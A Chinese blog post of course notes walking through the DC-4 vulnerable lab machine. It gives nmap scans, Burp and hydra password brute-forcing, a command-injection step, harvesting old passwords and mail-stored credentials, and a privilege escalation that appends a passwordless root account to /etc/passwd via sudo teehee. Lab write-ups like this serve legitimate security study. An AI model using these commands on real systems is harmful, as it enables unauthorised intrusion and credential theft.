引言:我的系列博客[网络安全学习篇]上线了,小编也是初次创作博客,经验不足;对千峰网络信息安全开源的视频公开课程的学习整理的笔记整理的也比较粗糙,其实看到目录有300多集的时候,讲道理,有点怂了,所以我就想到了通过写博客(课程笔记)的形式去学习它,虽然写博客会让我多花几倍的时间去学习它,但是当我完成一篇博客所获得的成就感和你们对于我的认同感,让我很满足,能够鼓励我一天天的坚持下去,也希望和我一起学习本期视频的"同道"们也能给一直坚持下去。我们大家一起加油。由于作者本身也是网络信息安全小白,大部分知识点都是初次接触,出现对其理解不深入,不完整,甚至也会出现错误有问题的地方,希望大家谅解、留言提出指正,同时也欢迎大家来找我一起交流学习!!!
往期博客:
第一阶段:
[网络安全学习篇1]:windowsxp、windows2003、windows7、windows2008系统部署(千峰网络安全视频笔记)
[网络安全学习篇24]:漏洞与木马(千峰网络安全视频笔记 p117-p118)
第二阶段:
第三阶段:
[网络安全学习篇42]:靶场环境搭建(ubuntu系统安装优化及vulhub安装)
[网络安全学习篇43]:PHP基础+变量 运算符 流程控制语句
第四阶段:
[网络安全学习篇72]:渗透测试实战-DC-4-靶机入侵(本篇)
下期博文:
目录
搭建靶场环境
链接:https://pan.baidu.com/s/1L-fHw8bNAPHS6jHx1BJA3A
提取码:8r7m
启动DC-4
获取其IP地址
nmap -sP 192.168.1.2/24
nmap -A 192.168.1.167 -p 1-65535 -oN nmap.A
访问其80端口
尝试使用bp 进行密码爆破
我们猜测其用户名很可能是admin,对admin用户密码进行爆破
添加密码字典
设置线程500
爆破成功,得到其密码happy
登录网站
使用[admin/happy]登录成功
我们发现可以执行一些系统命令
通过抓包,观察
存在命令注入漏洞
查看passwd 文件
依次查看各用户的家目录,在jim用户的家目录下发现旧的密码备份文件
将这些密码复制到kali 创建密码字典
vim old_passwd.bak
创建用户名字典
vim user.dic
charles
jim
sam
对ssh 进行爆破
hydra -L user.dic -P old_passwd.bak ssh://192.168.1.167 -vV -o hydra.ssh
得到账密[jim/jibril04]
尝试使用ssh 登录
ssh jim@192.168.1.167
成功连接
cd /var/mail
cat jim
尝试使用[charles/^xHhA&hvim0y]登录
查看可以不需要密码就可以使用root权限执行的命令
sudo -l
teehee -help
查看帮助信息,这条命令可以在文件的最后追加命令
在psaawd 文件末尾追加
sudo teehee -a /etc/passwd
GGG::0:0:::/bin/bash
提权成功,拿到flag
参考文献: